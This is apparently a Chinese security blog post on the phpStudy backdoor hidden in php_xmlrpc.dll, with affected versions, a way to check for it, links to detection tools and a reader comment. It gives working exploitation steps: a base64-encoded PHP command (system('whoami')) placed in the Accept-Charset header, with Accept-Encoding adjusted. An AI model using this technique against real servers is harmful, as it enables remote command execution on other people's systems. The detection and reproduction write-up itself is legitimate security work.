[渗透]php study后门检测

php study后门

  • phpstudy后门影响版本
phpstudy 2016版php-5.4
phpstudy 2018版php-5.2.17
phpstudy 2018版php-5.4.45
  • 后门位置

后门代码存在于extphp_xmlrpc.dll模块中

  • phpStudy2016路径

phpphp-5.2.17extphp_xmlrpc.dll
phpphp-5.4.45extphp_xmlrpc.dll

phpphp-5.2.17extphp_xmlrpc.dll
phpphp-5.4.45extphp_xmlrpc.dll
phph.png
phph01.png

漏洞证明:

  • notepad(可点击notepad下载中文版npp)打开此文件查找@eval,文件存在@eval(%s(‘%s’))证明漏洞存在

php02.png


漏洞复现

  • 访问本地搭建漏洞环境

hou03.png

  • 抓包:

rce.png

  • 修改请求包内容:

添加请求头:Accept-Charset:你需要执行的命令(base64加密)
另外:Accept-Encoding: gzip, deflate删除deflate前的空格
system('whoami');base64编码为:c3lzdGVtKCd3aG9hbWknKTs=
rce1.png

成功执行system函数(命令执行函数)
后续不再赘述。


  • 有关检测工具:
  • 本人自写检测程序:

https://gitee.com/mucn/codes/r8oinpdqlfv2t19bwkm7y72
rce2.png


  • windows下检测phpstudy后门工具
  • 作者:RG

phpstudy后门检测.zip
rce03.png

Mucn

Mucn

不管,看了我的博客就得帮忙转载,快点转载一下哦!❤️✔️

3 Comments

  • 菜鸡中的菜鸡

    啊,这太强了,大师傅,请问这里如果手工检测的话,任何页面都可以用那个修改请求包的方式检测吗?还是需要在首页进行抓包测试呢??

留下你的评论

快留下你的小秘密吧